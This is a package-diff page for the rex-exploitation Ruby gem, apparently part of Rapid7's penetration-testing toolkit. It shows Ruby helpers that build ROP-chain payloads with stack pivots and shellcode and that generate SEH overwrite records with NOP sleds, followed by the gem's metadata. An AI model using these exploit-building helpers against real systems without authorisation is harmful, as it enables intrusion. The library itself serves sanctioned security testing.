rex-exploitation 0.1.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +7 -0
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +1 -0
- data/.gitignore +9 -0
- data/.rspec +2 -0
- data/.travis.yml +5 -0
- data/CODE_OF_CONDUCT.md +74 -0
- data/Gemfile +4 -0
- data/README.md +33 -0
- data/Rakefile +6 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/data/exploits/cmdstager/debug_asm +91 -0
- data/data/exploits/cmdstager/debug_write +819 -0
- data/data/exploits/cmdstager/vbs_b64 +40 -0
- data/data/exploits/cmdstager/vbs_b64_adodb +50 -0
- data/data/exploits/cmdstager/vbs_b64_noquot +49 -0
- data/data/exploits/cmdstager/vbs_b64_sleep +41 -0
- data/data/js/detect/ie_addons.js +89 -0
- data/data/js/detect/misc_addons.js +157 -0
- data/data/js/detect/os.js +831 -0
- data/data/js/memory/explib2/lib/explib2.js +426 -0
- data/data/js/memory/explib2/payload/drop_exec.js +33 -0
- data/data/js/memory/explib2/payload/exec.js +10 -0
- data/data/js/memory/heap_spray.js +17 -0
- data/data/js/memory/heaplib2.js +192 -0
- data/data/js/memory/mstime_malloc.js +31 -0
- data/data/js/memory/property_spray.js +38 -0
- data/data/js/network/ajax_download.js +18 -0
- data/data/js/network/ajax_post.js +18 -0
- data/data/js/network/xhr_shim.js +15 -0
- data/data/js/utils/base64.js +126 -0
- data/data/ropdb/flash.xml +80 -0
- data/data/ropdb/hxds.xml +66 -0
- data/data/ropdb/java.xml +33 -0
- data/data/ropdb/msvcrt.xml +71 -0
- data/data/ropdb/reader.xml +132 -0
- data/data/ropdb/samba.xml +436 -0
- data/data/ropdb/stagefright.xml +225 -0
- data/lib/rex/exploitation.rb +7 -0
- data/lib/rex/exploitation/cmdstager.rb +11 -0
- data/lib/rex/exploitation/cmdstager/base.rb +189 -0
- data/lib/rex/exploitation/cmdstager/bourne.rb +118 -0
- data/lib/rex/exploitation/cmdstager/certutil.rb +114 -0
- data/lib/rex/exploitation/cmdstager/debug_asm.rb +139 -0
- data/lib/rex/exploitation/cmdstager/debug_write.rb +133 -0
- data/lib/rex/exploitation/cmdstager/echo.rb +166 -0
- data/lib/rex/exploitation/cmdstager/printf.rb +121 -0
- data/lib/rex/exploitation/cmdstager/tftp.rb +70 -0
- data/lib/rex/exploitation/cmdstager/vbs.rb +125 -0
- data/lib/rex/exploitation/egghunter.rb +423 -0
- data/lib/rex/exploitation/encryptjs.rb +79 -0
- data/lib/rex/exploitation/heaplib.js.b64 +331 -0
- data/lib/rex/exploitation/heaplib.rb +107 -0
- data/lib/rex/exploitation/js.rb +6 -0
- data/lib/rex/exploitation/js/detect.rb +70 -0
- data/lib/rex/exploitation/js/memory.rb +80 -0
- data/lib/rex/exploitation/js/network.rb +83 -0
- data/lib/rex/exploitation/js/utils.rb +32 -0
- data/lib/rex/exploitation/jsobfu.rb +17 -0
- data/lib/rex/exploitation/obfuscatejs.rb +336 -0
- data/lib/rex/exploitation/omelet.rb +321 -0
- data/lib/rex/exploitation/opcodedb.rb +819 -0
- data/lib/rex/exploitation/ropdb.rb +190 -0
- data/lib/rex/exploitation/seh.rb +93 -0
- data/lib/rex/exploitation/version.rb +5 -0
- data/rex-exploitation.gemspec +35 -0
- metadata +298 -0
- metadata.gz.sig +0 -0
@@ -0,0 +1,190 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
require 'rex/text'
|
3
|
+
require 'rexml/document'
|
4
|
+
|
5
|
+
|
6
|
+
module Rex
|
7
|
+
module Exploitation
|
8
|
+
|
9
|
+
###
|
10
|
+
#
|
11
|
+
# This class provides methods to access the ROP database, in order to generate
|
12
|
+
# a ROP-compatible payload on the fly.
|
13
|
+
#
|
14
|
+
###
|
15
|
+
class RopDb
|
16
|
+
def initialize
|
17
|
+
@base_path = File.join(File.dirname(__FILE__), '../../../data/ropdb/')
|
18
|
+
end
|
19
|
+
|
20
|
+
public
|
21
|
+
|
22
|
+
|
23
|
+
#
|
24
|
+
# Returns true if a ROP chain is available, otherwise false
|
25
|
+
#
|
26
|
+
def has_rop?(rop_name)
|
27
|
+
File.exist?(File.join(@base_path, "#{rop_name}.xml"))
|
28
|
+
end
|
29
|
+
|
30
|
+
#
|
31
|
+
# Returns an array of ROP gadgets. Each gadget can either be an offset, or a value (symbol or
|
32
|
+
# some integer). When the value is a symbol, it can be one of these: :nop, :junk, :size,
|
33
|
+
# :unsafe_negate_size, and :safe_negate_size
|
34
|
+
# Note if no RoP is found, it returns an empry array.
|
35
|
+
# Arguments:
|
36
|
+
# rop_name - name of the ROP chain.
|
37
|
+
# opts - A hash of optional arguments:
|
38
|
+
# 'target' - A regex string search against the compatibility list.
|
39
|
+
# 'base' - Specify a different base for the ROP gadgets.
|
40
|
+
#
|
41
|
+
def select_rop(rop, opts={})
|
42
|
+
target = opts['target'] || ''
|
43
|
+
base = opts['base'] || nil
|
44
|
+
|
45
|
+
raise RuntimeError, "#{rop} ROP chain is not available" if not has_rop?(rop)
|
46
|
+
xml = load_rop(File.join(@base_path, "#{rop}.xml"))
|
47
|
+
|
48
|
+
gadgets = []
|
49
|
+
|
50
|
+
xml.elements.each("db/rop") { |e|
|
51
|
+
name = e.attributes['name']
|
52
|
+
next if not has_target?(e, target)
|
53
|
+
|
54
|
+
if not base
|
55
|
+
default = e.elements['gadgets'].attributes['base'].scan(/^0x([0-9a-f]+)$/i).flatten[0]
|
56
|
+
base = default.to_i(16)
|
57
|
+
end
|
58
|
+
|
59
|
+
gadgets << parse_gadgets(e, base)
|
60
|
+
}
|
61
|
+
return gadgets.flatten
|
62
|
+
end
|
63
|
+
|
64
|
+
|
65
|
+
#
|
66
|
+
# Returns a payload with the user-supplied stack-pivot, a ROP chain,
|
67
|
+
# and then shellcode.
|
68
|
+
# Arguments:
|
69
|
+
# rop - Name of the ROP chain
|
70
|
+
# payload - Payload in binary
|
71
|
+
# opts - A hash of optional arguments:
|
72
|
+
# 'nop' - Used to generate nops with generate_sled()
|
73
|
+
# 'badchars' - Used in a junk gadget
|
74
|
+
# 'pivot' - Stack pivot in binary
|
75
|
+
# 'target' - A regex string search against the compatibility list.
|
76
|
+
# 'base' - Specify a different base for the ROP gadgets.
|
77
|
+
#
|
78
|
+
def generate_rop_payload(rop, payload, opts={})
|
79
|
+
nop = opts['nop'] || nil
|
80
|
+
badchars = opts['badchars'] || ''
|
81
|
+
pivot = opts['pivot'] || ''
|
82
|
+
target = opts['target'] || ''
|
83
|
+
base = opts['base'] || nil
|
84
|
+
|
85
|
+
rop = select_rop(rop, {'target'=>target, 'base'=>base})
|
86
|
+
# Replace the reserved words with actual gadgets
|
87
|
+
rop = rop.map {|e|
|
88
|
+
if e == :nop
|
89
|
+
sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
|
90
|
+
elsif e == :junk
|
91
|
+
Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
|
92
|
+
elsif e == :size
|
93
|
+
payload.length
|
94
|
+
elsif e == :unsafe_negate_size
|
95
|
+
get_unsafe_size(payload.length)
|
96
|
+
elsif e == :safe_negate_size
|
97
|
+
get_safe_size(payload.length)
|
98
|
+
else
|
99
|
+
e
|
100
|
+
end
|
101
|
+
}.pack("V*")
|
102
|
+
|
103
|
+
raise RuntimeError, "No ROP chain generated successfully" if rop.empty?
|
104
|
+
|
105
|
+
return pivot + rop + payload
|
106
|
+
end
|
107
|
+
|
108
|
+
private
|
109
|
+
|
110
|
+
|
111
|
+
#
|
112
|
+
# Returns a size that's safe from null bytes.
|
113
|
+
# This function will keep incrementing the value of "s" until it's safe from null bytes.
|
114
|
+
#
|
115
|
+
def get_safe_size(s)
|
116
|
+
safe_size = get_unsafe_size(s)
|
117
|
+
while (safe_size.to_s(16).rjust(8, '0')).scan(/../).include?("00")
|
118
|
+
safe_size -= 1
|
119
|
+
end
|
120
|
+
|
121
|
+
safe_size
|
122
|
+
end
|
123
|
+
|
124
|
+
|
125
|
+
#
|
126
|
+
# Returns a size that might contain one or more null bytes
|
127
|
+
#
|
128
|
+
def get_unsafe_size(s)
|
129
|
+
0xffffffff - s + 1
|
130
|
+
end
|
131
|
+
|
132
|
+
|
133
|
+
#
|
134
|
+
# Checks if a ROP chain is compatible
|
135
|
+
#
|
136
|
+
def has_target?(rop, target)
|
137
|
+
rop.elements.each('compatibility/target') { |t|
|
138
|
+
return true if t.text =~ /#{target}/i
|
139
|
+
}
|
140
|
+
return false
|
141
|
+
end
|
142
|
+
|
143
|
+
#
|
144
|
+
# Returns the database in XML
|
145
|
+
#
|
146
|
+
def load_rop(file_path)
|
147
|
+
f = File.open(file_path, 'rb')
|
148
|
+
xml = REXML::Document.new(f.read(f.stat.size))
|
149
|
+
f.close
|
150
|
+
return xml
|
151
|
+
end
|
152
|
+
|
153
|
+
|
154
|
+
#
|
155
|
+
# Returns gadgets
|
156
|
+
#
|
157
|
+
def parse_gadgets(e, image_base)
|
158
|
+
gadgets = []
|
159
|
+
e.elements.each('gadgets/gadget') { |g|
|
160
|
+
offset = g.attributes['offset']
|
161
|
+
value = g.attributes['value']
|
162
|
+
|
163
|
+
if offset
|
164
|
+
addr = offset.scan(/^0x([0-9a-f]+)$/i).flatten[0]
|
165
|
+
gadgets << (image_base + addr.to_i(16))
|
166
|
+
elsif value
|
167
|
+
case value
|
168
|
+
when 'nop'
|
169
|
+
gadgets << :nop
|
170
|
+
when 'junk'
|
171
|
+
gadgets << :junk
|
172
|
+
when 'size'
|
173
|
+
gadgets << :size
|
174
|
+
when 'unsafe_negate_size'
|
175
|
+
gadgets << :unsafe_negate_size
|
176
|
+
when 'safe_negate_size'
|
177
|
+
gadgets << :safe_negate_size
|
178
|
+
else
|
179
|
+
gadgets << value.to_i(16)
|
180
|
+
end
|
181
|
+
else
|
182
|
+
raise RuntimeError, "Missing offset or value attribute in '#{name}'"
|
183
|
+
end
|
184
|
+
}
|
185
|
+
return gadgets
|
186
|
+
end
|
187
|
+
end
|
188
|
+
|
189
|
+
end
|
190
|
+
end
|
@@ -0,0 +1,93 @@
|
|
1
|
+
# -*- coding: binary -*-
|
2
|
+
require 'rex/text'
|
3
|
+
require 'rex/arch/x86'
|
4
|
+
|
5
|
+
module Rex
|
6
|
+
module Exploitation
|
7
|
+
|
8
|
+
###
|
9
|
+
#
|
10
|
+
# This class provides methods for generating SEH registration records
|
11
|
+
# in a dynamic and flexible fashion. The records can be generated with
|
12
|
+
# the short jump at a random offset into the next pointer and with random
|
13
|
+
# padding in between the handler and the attacker's payload.
|
14
|
+
#
|
15
|
+
###
|
16
|
+
class Seh
|
17
|
+
|
18
|
+
#
|
19
|
+
# Creates a new instance of the class and initializes it with the supplied
|
20
|
+
# bad character list. The space argument denotes how much room is
|
21
|
+
# available for random padding and the NOP argument can be used to generate
|
22
|
+
# a random NOP sled that is better than 0x90.
|
23
|
+
#
|
24
|
+
def initialize(badchars = nil, space = nil, nop = nil)
|
25
|
+
self.badchars = badchars || ''
|
26
|
+
self.space = (space && space > 121) ? 121 : space
|
27
|
+
self.nop = nop
|
28
|
+
end
|
29
|
+
|
30
|
+
#
|
31
|
+
# Generates an SEH record
|
32
|
+
#
|
33
|
+
def generate_seh_record(handler, dynamic=false)
|
34
|
+
if (dynamic)
|
35
|
+
generate_dynamic_seh_record(handler)
|
36
|
+
else
|
37
|
+
generate_static_seh_record(handler)
|
38
|
+
end
|
39
|
+
end
|
40
|
+
|
41
|
+
#
|
42
|
+
# Generates a fake SEH registration record with the supplied handler
|
43
|
+
# address for the handler, and a nop generator to use when generating
|
44
|
+
# padding inside the next pointer. The NOP generator must implement the
|
45
|
+
# 'generate_sled' method that takes a length and a list of bad
|
46
|
+
# characters.
|
47
|
+
#
|
48
|
+
def generate_dynamic_seh_record(handler)
|
49
|
+
|
50
|
+
# Generate the padding up to the size specified or 121 characters
|
51
|
+
# maximum to account for the maximum range of a short jump plus the
|
52
|
+
# record size.
|
53
|
+
pad = rand(space || 121)
|
54
|
+
rsize = pad + 8
|
55
|
+
|
56
|
+
# Calculate the random index into the next ptr to store the short jump
|
57
|
+
# instruction
|
58
|
+
jmpidx = rand(3)
|
59
|
+
|
60
|
+
# Build the prefixed sled for the bytes that come before the short jump
|
61
|
+
# instruction
|
62
|
+
sled = (nop) ? nop.generate_sled(jmpidx, badchars) : ("\x90" * jmpidx)
|
63
|
+
|
64
|
+
# Seed the record and any space after the record with random text
|
65
|
+
record = Rex::Text.rand_text(rsize, badchars)
|
66
|
+
|
67
|
+
# Build the next pointer and short jump instruction
|
68
|
+
record[jmpidx, 2] = Rex::Arch::X86.jmp_short((rsize - jmpidx) - 2)
|
69
|
+
record[0, jmpidx] = sled
|
70
|
+
|
71
|
+
# Set the handler in the registration record
|
72
|
+
record[4, 4] = [ handler ].pack('V')
|
73
|
+
|
74
|
+
# Return the generated record to the caller
|
75
|
+
record
|
76
|
+
end
|
77
|
+
|
78
|
+
#
|
79
|
+
# Generates a static SEH registration record with a specific handler and
|
80
|
+
# next pointer.
|
81
|
+
#
|
82
|
+
def generate_static_seh_record(handler)
|
83
|
+
"\xeb\x06" + Rex::Text.rand_text(2, badchars) + [ handler ].pack('V')
|
84
|
+
end
|
85
|
+
|
86
|
+
protected
|
87
|
+
|
88
|
+
attr_accessor :badchars, :space, :nop # :nodoc:
|
89
|
+
|
90
|
+
end
|
91
|
+
|
92
|
+
end
|
93
|
+
end
|
@@ -0,0 +1,35 @@
|
|
1
|
+
# coding: utf-8
|
2
|
+
lib = File.expand_path('../lib', __FILE__)
|
3
|
+
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
|
4
|
+
require 'rex/exploitation/version'
|
5
|
+
|
6
|
+
Gem::Specification.new do |spec|
|
7
|
+
spec.name = "rex-exploitation"
|
8
|
+
spec.version = Rex::Exploitation::VERSION
|
9
|
+
spec.authors = ["David Maloney"]
|
10
|
+
spec.email = ["DMaloney@rapid7.com"]
|
11
|
+
|
12
|
+
spec.summary = %q{Ruby Exploitation(Rex) library for various exploitation helpers}
|
13
|
+
spec.description = %q{This gem contains various helper mechanisms for creating exploits.
|
14
|
+
This includes SEH Overwrite helpers, egghunters, command stagers and more.}
|
15
|
+
spec.homepage = "https://github.com/rapid7/rex-exploitation"
|
16
|
+
|
17
|
+
|
18
|
+
spec.files = `git ls-files -z`.split("\x0").reject do |f|
|
19
|
+
f.match(%r{^(test|spec|features)/})
|
20
|
+
end
|
21
|
+
spec.bindir = "exe"
|
22
|
+
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
|
23
|
+
spec.require_paths = ["lib"]
|
24
|
+
|
25
|
+
spec.add_development_dependency "bundler", "~> 1.13"
|
26
|
+
spec.add_development_dependency "rake", "~> 10.0"
|
27
|
+
spec.add_development_dependency "rspec", "~> 3.0"
|
28
|
+
|
29
|
+
spec.add_runtime_dependency 'rex-text'
|
30
|
+
spec.add_runtime_dependency 'rex-arch'
|
31
|
+
spec.add_runtime_dependency 'rex-encoder'
|
32
|
+
spec.add_runtime_dependency 'metasm'
|
33
|
+
# Needed for Javascript obfuscation
|
34
|
+
spec.add_runtime_dependency 'jsobfu'
|
35
|
+
end
|
metadata
ADDED
@@ -0,0 +1,298 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: rex-exploitation
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: 0.1.0
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- David Maloney
|
8
|
+
autorequire:
|
9
|
+
bindir: exe
|
10
|
+
cert_chain:
|
11
|
+
- |
|
12
|
+
-----BEGIN CERTIFICATE-----
|
13
|
+
MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG
|
14
|
+
A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
|
15
|
+
b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw
|
16
|
+
MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
|
17
|
+
YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT
|
18
|
+
aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ
|
19
|
+
jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp
|
20
|
+
xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp
|
21
|
+
1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG
|
22
|
+
snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ
|
23
|
+
U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8
|
24
|
+
9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E
|
25
|
+
BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B
|
26
|
+
AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz
|
27
|
+
yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE
|
28
|
+
38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP
|
29
|
+
AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad
|
30
|
+
DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME
|
31
|
+
HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4A==
|
32
|
+
-----END CERTIFICATE-----
|
33
|
+
- |
|
34
|
+
-----BEGIN CERTIFICATE-----
|
35
|
+
MIIEKDCCAxCgAwIBAgILBAAAAAABL07hNVwwDQYJKoZIhvcNAQEFBQAwVzELMAkG
|
36
|
+
A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
|
37
|
+
b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw0xMTA0MTMxMDAw
|
38
|
+
MDBaFw0xOTA0MTMxMDAwMDBaMFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
|
39
|
+
YWxTaWduIG52LXNhMScwJQYDVQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENB
|
40
|
+
IC0gRzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCyTxTnEL7XJnKr
|
41
|
+
NpfvU79ChF5Y0Yoo/ENGb34oRFALdV0A1zwKRJ4gaqT3RUo3YKNuPxL6bfq2RsNq
|
42
|
+
o7gMJygCVyjRUPdhOVW4w+ElhlI8vwUd17Oa+JokMUnVoqni05GrPjxz7/Yp8cg1
|
43
|
+
0DB7f06SpQaPh+LO9cFjZqwYaSrBXrta6G6V/zuAYp2Zx8cvZtX9YhqCVVrG+kB3
|
44
|
+
jskwPBvw8jW4bFmc/enWyrRAHvcEytFnqXTjpQhU2YM1O46MIwx1tt6GSp4aPgpQ
|
45
|
+
STic0qiQv5j6yIwrJxF+KvvO3qmuOJMi+qbs+1xhdsNE1swMfi9tBoCidEC7tx/0
|
46
|
+
O9dzVB/zAgMBAAGjgfowgfcwDgYDVR0PAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYB
|
47
|
+
Af8CAQAwHQYDVR0OBBYEFAhu2Lacir/tPtfDdF3MgB+oL1B6MEcGA1UdIARAMD4w
|
48
|
+
PAYEVR0gADA0MDIGCCsGAQUFBwIBFiZodHRwczovL3d3dy5nbG9iYWxzaWduLmNv
|
49
|
+
bS9yZXBvc2l0b3J5LzAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdsb2Jh
|
50
|
+
bHNpZ24ubmV0L3Jvb3QuY3JsMBMGA1UdJQQMMAoGCCsGAQUFBwMDMB8GA1UdIwQY
|
51
|
+
MBaAFGB7ZhpFDZfKiVAvfQTNNKj//P1LMA0GCSqGSIb3DQEBBQUAA4IBAQAiXMXd
|
52
|
+
PfQLcNjj9efFjgkBu7GWNlxaB63HqERJUSV6rg2kGTuSnM+5Qia7O2yX58fOEW1o
|
53
|
+
kdqNbfFTTVQ4jGHzyIJ2ab6BMgsxw2zJniAKWC/wSP5+SAeq10NYlHNUBDGpeA07
|
54
|
+
jLBwwT1+170vKsPi9Y8MkNxrpci+aF5dbfh40r5JlR4VeAiR+zTIvoStvODG3Rjb
|
55
|
+
88rwe8IUPBi4A7qVPiEeP2Bpen9qA56NSvnwKCwwhF7sJnJCsW3LZMMSjNaES2dB
|
56
|
+
fLEDF3gJ462otpYtpH6AA0+I98FrWkYVzSwZi9hwnOUtSYhgcqikGVJwQ17a1kYD
|
57
|
+
sGgOJO9K9gslJO8k
|
58
|
+
-----END CERTIFICATE-----
|
59
|
+
- |
|
60
|
+
-----BEGIN CERTIFICATE-----
|
61
|
+
MIIEyjCCA7KgAwIBAgISESEyE8rNriS4+1dc8jOHEUL8MA0GCSqGSIb3DQEBBQUA
|
62
|
+
MFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMScwJQYD
|
63
|
+
VQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENBIC0gRzIwHhcNMTMxMDExMTUx
|
64
|
+
NTM4WhcNMTYxMDExMTUxNTM4WjBgMQswCQYDVQQGEwJVUzEWMBQGA1UECBMNTWFz
|
65
|
+
c2FjaHVzZXR0czEPMA0GA1UEBxMGQm9zdG9uMRMwEQYDVQQKEwpSYXBpZDcgTExD
|
66
|
+
MRMwEQYDVQQDEwpSYXBpZDcgTExDMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
|
67
|
+
CgKCAQEAhD//7+739c69hssg0mD6CXgf2JkuWTcU81dgD7aKcoEPqU8e1FseBvDW
|
68
|
+
/Q5fNK2H2NgHV/Msn18zXuK0PkaJXqj/vDsuKB3Hq0BiR2AwyDdEw8K5MK5bgQc2
|
69
|
+
tmcVtEAejRoy1Uv5UyfaAYAxG6zsma3buV1fjnEAC3VouRg4+EX/f65H/a6srntK
|
70
|
+
5Etp3D71k2f0oUl8dOqOmSsRJQQ5zSs4ktDvpjAmsvzoA+1svceLYU95mvQsIw2T
|
71
|
+
edpmibGMwGw/HmgV+YWBgF5UGvax6zbC2i6DF2YHnDfkNb8/1MEIaxOTAbJTazTK
|
72
|
+
8laCQOyay6L1BNPQKjZBgOge8LZq1wIDAQABo4IBizCCAYcwDgYDVR0PAQH/BAQD
|
73
|
+
AgeAMEwGA1UdIARFMEMwQQYJKwYBBAGgMgEyMDQwMgYIKwYBBQUHAgEWJmh0dHBz
|
74
|
+
Oi8vd3d3Lmdsb2JhbHNpZ24uY29tL3JlcG9zaXRvcnkvMAkGA1UdEwQCMAAwEwYD
|
75
|
+
VR0lBAwwCgYIKwYBBQUHAwMwPgYDVR0fBDcwNTAzoDGgL4YtaHR0cDovL2NybC5n
|
76
|
+
bG9iYWxzaWduLmNvbS9ncy9nc2NvZGVzaWduZzIuY3JsMIGGBggrBgEFBQcBAQR6
|
77
|
+
MHgwQAYIKwYBBQUHMAKGNGh0dHA6Ly9zZWN1cmUuZ2xvYmFsc2lnbi5jb20vY2Fj
|
78
|
+
ZXJ0L2dzY29kZXNpZ25nMi5jcnQwNAYIKwYBBQUHMAGGKGh0dHA6Ly9vY3NwMi5n
|
79
|
+
bG9iYWxzaWduLmNvbS9nc2NvZGVzaWduZzIwHQYDVR0OBBYEFE536JwFx9SpaEi3
|
80
|
+
w8pcq2GRFA5BMB8GA1UdIwQYMBaAFAhu2Lacir/tPtfDdF3MgB+oL1B6MA0GCSqG
|
81
|
+
SIb3DQEBBQUAA4IBAQAGpGXHtFLjTTivV+xQPwtZhfPuJ7f+VGTMSAAYWmfzyHXM
|
82
|
+
YMFYUWJzSFcuVR2YfxtbS45P7U5Qopd7jBQ0Ygk5h2a+B5nE4+UlhHj665d0zpYM
|
83
|
+
1eWndMaO6WBOYnqtNyi8Dqqc1foKZDNHEDggYhGso7OIBunup+N4sPL9PwQ3eYe6
|
84
|
+
mUu8z0E4GXYViaMPOFkqaYnoYgf2L+7L5zKYT4h/NE/P7kj7EbduHgy/v/aAIrNl
|
85
|
+
2SpuQH+SWteq3NXkAmFEEqvLJQ4sbptZt8OP8ghL3pVAvZNFmww/YVszSkShSzcg
|
86
|
+
QdihYCSEL2drS2cFd50jBeq71sxUtxbv82DUa2b+
|
87
|
+
-----END CERTIFICATE-----
|
88
|
+
date: 2016-10-03 00:00:00.000000000 Z
|
89
|
+
dependencies:
|
90
|
+
- !ruby/object:Gem::Dependency
|
91
|
+
name: bundler
|
92
|
+
requirement: !ruby/object:Gem::Requirement
|
93
|
+
requirements:
|
94
|
+
- - "~>"
|
95
|
+
- !ruby/object:Gem::Version
|
96
|
+
version: '1.13'
|
97
|
+
type: :development
|
98
|
+
prerelease: false
|
99
|
+
version_requirements: !ruby/object:Gem::Requirement
|
100
|
+
requirements:
|
101
|
+
- - "~>"
|
102
|
+
- !ruby/object:Gem::Version
|
103
|
+
version: '1.13'
|
104
|
+
- !ruby/object:Gem::Dependency
|
105
|
+
name: rake
|
106
|
+
requirement: !ruby/object:Gem::Requirement
|
107
|
+
requirements:
|
108
|
+
- - "~>"
|
109
|
+
- !ruby/object:Gem::Version
|
110
|
+
version: '10.0'
|
111
|
+
type: :development
|
112
|
+
prerelease: false
|
113
|
+
version_requirements: !ruby/object:Gem::Requirement
|
114
|
+
requirements:
|
115
|
+
- - "~>"
|
116
|
+
- !ruby/object:Gem::Version
|
117
|
+
version: '10.0'
|
118
|
+
- !ruby/object:Gem::Dependency
|
119
|
+
name: rspec
|
120
|
+
requirement: !ruby/object:Gem::Requirement
|
121
|
+
requirements:
|
122
|
+
- - "~>"
|
123
|
+
- !ruby/object:Gem::Version
|
124
|
+
version: '3.0'
|
125
|
+
type: :development
|
126
|
+
prerelease: false
|
127
|
+
version_requirements: !ruby/object:Gem::Requirement
|
128
|
+
requirements:
|
129
|
+
- - "~>"
|
130
|
+
- !ruby/object:Gem::Version
|
131
|
+
version: '3.0'
|
132
|
+
- !ruby/object:Gem::Dependency
|
133
|
+
name: rex-text
|
134
|
+
requirement: !ruby/object:Gem::Requirement
|
135
|
+
requirements:
|
136
|
+
- - ">="
|
137
|
+
- !ruby/object:Gem::Version
|
138
|
+
version: '0'
|
139
|
+
type: :runtime
|
140
|
+
prerelease: false
|
141
|
+
version_requirements: !ruby/object:Gem::Requirement
|
142
|
+
requirements:
|
143
|
+
- - ">="
|
144
|
+
- !ruby/object:Gem::Version
|
145
|
+
version: '0'
|
146
|
+
- !ruby/object:Gem::Dependency
|
147
|
+
name: rex-arch
|
148
|
+
requirement: !ruby/object:Gem::Requirement
|
149
|
+
requirements:
|
150
|
+
- - ">="
|
151
|
+
- !ruby/object:Gem::Version
|
152
|
+
version: '0'
|
153
|
+
type: :runtime
|
154
|
+
prerelease: false
|
155
|
+
version_requirements: !ruby/object:Gem::Requirement
|
156
|
+
requirements:
|
157
|
+
- - ">="
|
158
|
+
- !ruby/object:Gem::Version
|
159
|
+
version: '0'
|
160
|
+
- !ruby/object:Gem::Dependency
|
161
|
+
name: rex-encoder
|
162
|
+
requirement: !ruby/object:Gem::Requirement
|
163
|
+
requirements:
|
164
|
+
- - ">="
|
165
|
+
- !ruby/object:Gem::Version
|
166
|
+
version: '0'
|
167
|
+
type: :runtime
|
168
|
+
prerelease: false
|
169
|
+
version_requirements: !ruby/object:Gem::Requirement
|
170
|
+
requirements:
|
171
|
+
- - ">="
|
172
|
+
- !ruby/object:Gem::Version
|
173
|
+
version: '0'
|
174
|
+
- !ruby/object:Gem::Dependency
|
175
|
+
name: metasm
|
176
|
+
requirement: !ruby/object:Gem::Requirement
|
177
|
+
requirements:
|
178
|
+
- - ">="
|
179
|
+
- !ruby/object:Gem::Version
|
180
|
+
version: '0'
|
181
|
+
type: :runtime
|
182
|
+
prerelease: false
|
183
|
+
version_requirements: !ruby/object:Gem::Requirement
|
184
|
+
requirements:
|
185
|
+
- - ">="
|
186
|
+
- !ruby/object:Gem::Version
|
187
|
+
version: '0'
|
188
|
+
- !ruby/object:Gem::Dependency
|
189
|
+
name: jsobfu
|
190
|
+
requirement: !ruby/object:Gem::Requirement
|
191
|
+
requirements:
|
192
|
+
- - ">="
|
193
|
+
- !ruby/object:Gem::Version
|
194
|
+
version: '0'
|
195
|
+
type: :runtime
|
196
|
+
prerelease: false
|
197
|
+
version_requirements: !ruby/object:Gem::Requirement
|
198
|
+
requirements:
|
199
|
+
- - ">="
|
200
|
+
- !ruby/object:Gem::Version
|
201
|
+
version: '0'
|
202
|
+
description: |-
|
203
|
+
This gem contains various helper mechanisms for creating exploits.
|
204
|
+
This includes SEH Overwrite helpers, egghunters, command stagers and more.
|
205
|
+
email:
|
206
|
+
- DMaloney@rapid7.com
|
207
|
+
executables: []
|
208
|
+
extensions: []
|
209
|
